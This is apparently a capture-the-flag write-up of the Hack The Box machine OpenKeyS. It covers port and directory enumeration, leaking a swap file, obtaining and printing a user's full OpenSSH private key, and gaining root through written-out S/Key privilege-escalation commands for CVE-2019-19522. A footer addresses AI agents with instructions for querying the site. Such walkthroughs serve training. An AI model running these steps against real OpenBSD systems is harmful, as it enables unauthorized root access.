# OpenKeyS ![](/files/-MOnqOnBZcD0_L40mkFH) ## Overview OpenKeyS was, at the time, one of the few boxes I had done where it revolved around exploiting published vulnerabilities. It was very fun and interesting to say the least. Even though it was rated as Medium, it was fairly easy to tackle if your enumeration was done right. ### References * [OpenBSD Authentication Bypass and Local Privilege Escalation Vulnerabilities](https://www.secpod.com/blog/openbsd-authentication-bypass-and-local-privilege-escalation-vulnerabilities/) * [Qualys Security Advisory - OpenBSD Authentication Bypass / Privilege Escalation](https://packetstormsecurity.com/files/155572/Qualys-Security-Advisory-OpenBSD-Authentication-Bypass-Privilege-Escalation.html) ## Enumeration ### Masscan: Finding Open Ports Here, we will be looking for any open ports, both TCP and UDP to then find our attack path once further port scanning as been completed. ```bash jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.199 --rate=1000 | tee OpenKeys_OpenPorts.log Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-09-13 15:13:54 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.199 Discovered open port 22/tcp on 10.10.10.199 ``` ### Nmap: Port Scanning Using the log file created from the *masscan* execution, we will filter the port numbers to simplify our lives. In this case as we only have to ports to enumerate, we could've saved that step. At this point in my process, I was relying on *aggressive* scanning, which is technically not necessary and should not be done if we do not want to be detected. ```bash jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ PORTS=$(cat OpenKeys_OpenPorts.log | grep open | cut -d" " -f4 | cut -d"/" -f1 | xargs | tr " " ",") jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -A -sV -p $PORTS openkeys.htb -oN OpenKeys_PortScan.log -oX OpenKeys_PortScan.xml Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:18 EDT Nmap scan report for openkeys.htb (10.10.10.199) Host is up (0.19s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.1 (protocol 2.0) | ssh-hostkey: | 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA) | 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA) |_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519) 80/tcp open http OpenBSD httpd |_http-title: Site doesn't have a title (text/html). Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.11 seconds jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ nmap -sV -p 22 openkeys.htb --script vulners Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 11:31 EDT Nmap scan report for openkeys.htb (10.10.10.199) Host is up (0.18s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.1 (protocol 2.0) | vulners: | cpe:/a:openbsd:openssh:8.1: | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 |_ CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds ``` ### Gobuster: Directory Enumeration Given the web service exposed, it is the next step into our enumeration. At the same time, we must note that everything goes and the OpenBSD SSH service must also be researched. ```bash jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ gobuster dir -k -u http://openkeys.htb/ -w /usr/share/wordlists/dirb/common.txt -r -l -b 403,404 -t 50 --timeout 20s --wildcard 2> /dev/null =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://openkeys.htb/ [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 403,404 [+] User Agent: gobuster/3.0.1 [+] Show length: true [+] Follow Redir: true [+] Timeout: 20s =============================================================== 2020/09/13 12:22:28 Starting gobuster =============================================================== /css (Status: 200) [Size: 697] /fonts (Status: 200) [Size: 1066] /index.html (Status: 200) [Size: 96] /index.php (Status: 200) [Size: 4837] /images (Status: 200) [Size: 589] /includes (Status: 200) [Size: 711] /js (Status: 200) [Size: 582] /vendor (Status: 200) [Size: 1522] =============================================================== 2020/09/13 12:22:57 Finished =============================================================== ``` ## Exploitation and Gaining Access Inspecting /includes gave us access to a swap file. We need to retrieve it in order to inspect it offline. ```bash jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ wget http://openkeys.htb/includes/auth.php.swp --2020-09-13 12:40:05-- http://openkeys.htb/includes/auth.php.swp Resolving openkeys.htb (openkeys.htb)... 10.10.10.199 Connecting to openkeys.htb (openkeys.htb)|10.10.10.199|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘auth.php.swp’ auth.php.swp [ <=> ] 12.00K 29.4KB/s in 0.4s 2020-09-13 12:40:05 (29.4 KB/s) - ‘auth.php.swp’ saved [12288] jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ strings auth.php.swp b0VIM 8.1 jennifer openkeys.htb /var/www/htdocs/includes/auth.php 3210 #"! session_start(); session_destroy(); session_unset(); function close_session() $_SESSION["username"] = $_REQUEST['username']; $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT']; $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR']; $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME']; $_SESSION["login_time"] = $_SERVER['REQUEST_TIME']; $_SESSION["logged_in"] = True; function init_session() } return False; { else } } return True; $_SESSION['last_activity'] = $time; // Session is active, update last activity time and return True { else } return False; close_session(); { ($time - $_SESSION['last_activity']) > $session_timeout) if (isset($_SESSION['last_activity']) && $time = $_SERVER['REQUEST_TIME']; // Has the session expired? { if(isset($_SESSION["logged_in"])) // Is the user logged in? session_start(); // Start the session $session_timeout = 300; // Session timeout in seconds function is_active_session() return $retcode; system($cmd, $retcode); $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password); function authenticate($username, $password) OpenKeyS - Retrieve your OpenSSH Keys

OpenSSH key for user jennifer

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Back to login page
``` BINGO!! What we just retrieved is the SSH private key from 'jennifer'. Let's use it to access the system as this user. ```bash jxberrios@back0ff:~/Documents/HTB-Labs/OpenKeys$ ssh -i jennifer.key jennifer@openkeys.htb Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2 OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. openkeys$ id uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel) openkeys$ ls user.txt openkeys$ cat user.txt 36ab21********************1d2b10 ``` And we have found the user flag! Let follow on and attempt to escalate privileges by using a related vulnerability as the one we used against httpd. ## Privilege Escalation The vulnerability used to bypass authentication against httpd is associated as well with CVE-2019-19522, in which local privilege escalation can be achieved via S/Key and YubiKey. In this case, we will leverage S/Key. ```bash openkeys$ cd /tmp openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root openkeys$ chmod 0600 /etc/skey/root openkeys$ env -i TERM=vt220 su -l -a skey otp-md5 99 obsd91335 S/Key Password: S/Key Password [echo on]: Sorry openkeys$ env -i TERM=vt220 su -l -a skey otp-md5 99 obsd91335 S/Key Password: EGG LARD GROW HOG DRAG LAIN openkeys# id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) ``` As shown above, by following the associated vulnerability specifications, we were able to escalate privileges. Now, let's grab the root flag: ```bash openkeys# pwd /root openkeys# ls .Xdefaults .cshrc .forward .profile .viminfo root.txt .composer .cvsrc .login .ssh dead.letter openkeys# cat dead.letter Date: Sun, 13 Sep 2020 15:40:02 +0000 (UTC) From: root (Cron Daemon) To: root Subject: Cron /usr/bin/find /tmp -name "sess*" -amin +5 -exec rm {} \; Auto-Submitted: auto-generated X-Cron-Env: X-Cron-Env: X-Cron-Env: X-Cron-Env: X-Cron-Env: rm: /tmp/sess_gvhju8kvqk0m4dup24fhsm3c15: No such file or directory rm: /tmp/sess_euod42diulnrrbir7cp2ehdioa: No such file or directory rm: /tmp/sess_j094qg8rs6kpk76k7ukb5tlt0c: No such file or directory rm: /tmp/sess_m447es74eb7k33ro5c66bs2hiq: No such file or directory rm: /tmp/sess_hg0vdh8grjilq15r26da6b2um8: No such file or directory openkeys# cat root.txt f3a553********************fc6efa ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://grav3m1nd-byte.gitbook.io/htb-resources/htb-retired-boxes/openkeys.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.